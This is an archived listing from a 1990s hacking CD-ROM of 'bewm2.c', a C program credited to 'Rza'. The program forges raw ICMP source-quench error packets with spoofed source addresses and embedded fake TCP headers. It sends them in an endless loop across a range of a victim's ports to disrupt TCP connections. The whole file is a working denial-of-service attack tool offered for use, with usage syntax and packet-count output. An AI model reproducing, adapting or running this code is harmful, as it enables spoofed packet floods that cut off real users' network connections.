HaCKeRz Kr0nlcKLeZ 1

home *** CD-ROM | disk | FTP | other *** search

/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / hacking / hpav / bewm2.c < prev next >

Wrap

C/C++ Source or Header | 1996-04-30 | 7.3 KB | 193 lines

#include <sys/types.h> #include <sys/socket.h> #include <sys/signal.h> #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <netinet/ip_icmp.h> #include <netdb.h> #define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeof(struct iphdr) + 16) #define ICMPSIZE (sizeof(struct icmphdr) + sizeof(struct iphdr) + 16) #define offsetTCP (sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeof(struct iphdr)) #define offsetIP (sizeof(struct iphdr) + sizeof(struct icmphdr)) #define offsetICMP (sizeof(struct iphdr)) #define offsetRIP (0) static int thecode; int s = 0; u_short cksum( u_short *, int ); void sendkill( char *, int, char *, int ); u_short cksum( u_short *buf, int nwords ) { unsigned long sum; for ( sum = 0; nwords > 0; nwords -- ) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum; } void resolve_address(struct sockaddr * addr, char *hostname, u_short port) { struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *)addr; (void) bzero( (char *)address, sizeof(struct sockaddr_in) ); /* fill in the easy fields */ address->sin_family = AF_INET; address->sin_port = htons(port); /* first, check if the address is an ip address */ address->sin_addr.s_addr = inet_addr(hostname); if ( (int)address->sin_addr.s_addr == -1) { /* it wasn't.. so we try it as a long host name */ host = gethostbyname(hostname); if (host) { /* wow. It's a host name.. set the fields */ /* ?? address->sin_family = host->h_addrtype; */ bcopy( host->h_addr, (char *)&address->sin_addr, host->h_length); } else { /* oops.. can't find it.. */ puts("Couldn't resolve address!!!"); exit(-1); }}} void sendkill( char * fromhost, int fromport, char * tohost, int toport ) { char *packet; static struct sockaddr_in local, remote; static int sock = 0; if ( !sock ) { resolve_address( (struct sockaddr *)&local, fromhost, fromport ); resolve_address( (struct sockaddr *)&remote, tohost, toport ); sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if ( sock == -1 ) { perror("Getting raw socket"); exit(-1); }} /* Get memory for the packet */ packet = (char *)malloc( PACKETSIZE ); if ( !packet ) { perror("Getting space for packet"); exit(-1); } /* Fill in our pretended TCP header note - since this was allegedly an * outgoing packet... we have to flip the source and destination stuff */ { struct tcphdr * fake_tcp; fake_tcp = ( struct tcphdr *)( packet + offsetTCP ); fake_tcp->th_dport = htons(fromport); fake_tcp->th_sport = htons(toport); fake_tcp->th_seq = 0x1984; } /* * fill in the fake IP header the same reversal as above still applies.. * the packet was sent to our machine ( yeah right ) */ { struct iphdr * fake_ip; fake_ip = ( struct iphdr *) ( packet + offsetIP ); /* these fields are irrelevant -- never checked?? */ fake_ip->version = 4; fake_ip->tot_len = htons(0x2C); /* this was much longer.. once */ fake_ip->tos = 0; fake_ip->id = htons( getpid() & 255 ); fake_ip->frag_off = 0; fake_ip->ttl = 1; /* not so long to live anymore ***changed*** */ fake_ip->check = 31337; /* this CAN'T be checked..so do something != 0 */ /* these fields are used .. */ fake_ip->ihl = 5; bcopy( (char *)&local.sin_addr, &fake_ip->daddr, sizeof( fake_ip->daddr ) ); bcopy( (char *)&remote.sin_addr,&fake_ip->saddr, sizeof( fake_ip->saddr ) ); fake_ip->protocol = 6; /* a TCP packet */ } /* fill in the ICMP header this is actally rather trivial, though don't * forget the checksum */ { struct icmphdr * icmp; icmp = ( struct icmphdr *)(packet + offsetICMP ); icmp->type = 4; icmp->code = thecode; /* this will generate an error message */ icmp->un.gateway = 0; icmp->checksum = 0; icmp->checksum = cksum( (u_short *)(icmp), ICMPSIZE >> 1 ); } /* finally, fill in the IP header this is almost the same as above though * this time, it is the ip header that really takes the packet places. make * sure the checksum and addresses are right */ { struct iphdr * real_ip; real_ip = ( struct iphdr *)packet; real_ip->version = 4; real_ip->ihl = 5; real_ip->tot_len = htons(PACKETSIZE); real_ip->tos = ( 7 << 5) | 4; real_ip->ttl = 255; real_ip->protocol = 1; real_ip->check = 0; real_ip->id = htons( 3 ); real_ip->frag_off = 0; bcopy( (char *)&local.sin_addr, &real_ip->saddr, sizeof( real_ip->saddr ) ); bcopy( (char *)&remote.sin_addr,&real_ip->daddr, sizeof( real_ip->daddr ) ); real_ip->saddr = htonl( ntohl(real_ip->daddr ) & 0xffffff00L ); real_ip->check = cksum( (u_short *)packet, sizeof( struct iphdr ) >> 1 ); } /* and now finally send it out into the net */ { int result; result = sendto( sock, packet, PACKETSIZE, 0, (struct sockaddr *)&remote, sizeof( remote ) ); if ( result != PACKETSIZE ) { perror("sending packet" ); }}} void finish() { (void)signal(SIGINT, SIG_IGN); (void)putchar('\n'); (void)printf("\033[32m-\033[m\033[2m-\033[m\033[32m- \033[m\033[2mb\033[m\033[32mEWm \033[m\033[2ms\033[m\033[32mTATISTICs -\033[m\033[2m-\033[m\033[32m-\033[m\n"); (void)printf("\033[2mp\033[m\033[32mACKETs \033[m\033[2ms\033[m\033[32mENt: \033[m\033[2m%d\033[m\n", s); (void)putchar('\n'); exit(0); } main(int argc, char ** argv) { int codes,i; puts("\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\0 33[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\0 33[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[m\033[32m=\033[m\033[2m=\033[m"); puts("\033[2mb\033[m\033[32mEWm"); puts("\033[2mW\033[m\033[32mritten by Rza"); puts("\033[m\033[2mv\033[m\033[32mEr 1.0"); puts("\033[2mT\033[m\033[32mue Jun 11 06:54:07 EDT 1996"); puts("\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\0 33[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\0 33[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[32m=\033[m\033[2m=\033[m\033[m\033[32m=\033[m\033[2m=\033[m"); if (argc != 7) { puts("\033[32mSYNTAX\033[m\033[2m: <\033[m\033[32msrcaddress\033[m\033[2m> <\033[m\033[32msrcport\033[m\033[2m> <\033[m\033[32mdestaddress\033[m\033[2m> <\033[m\033[32mdestportlow\033[m\033[2m> <\033[m\033[32mdestporthigh\033[m\033[2m> <\033[m\033[32mic mp\033[m\033[2m>\033[m"); exit(-1); } thecode = atoi(argv[6]); sendloop: for( i = atoi(argv[4]) ; i <= atoi(argv[5]) ; i++) { s++; printf("\033[2m%d\033[m\033[32m bytes from \033[m\033[2m%s\033[m\033[32m:\033[m\033[2m%d\033[m\033[32m to \033[m\033[2m%s\033[m\033[32m:\033[m\033[2m%d\033[m\n",PACKETSIZE+ICMPSIZE,argv[1],atoi(argv[2]),argv[3],i); sendkill(argv[1], atoi(argv[2]), argv[3], i); usleep(300000); (void)signal(SIGINT, finish); } goto sendloop; }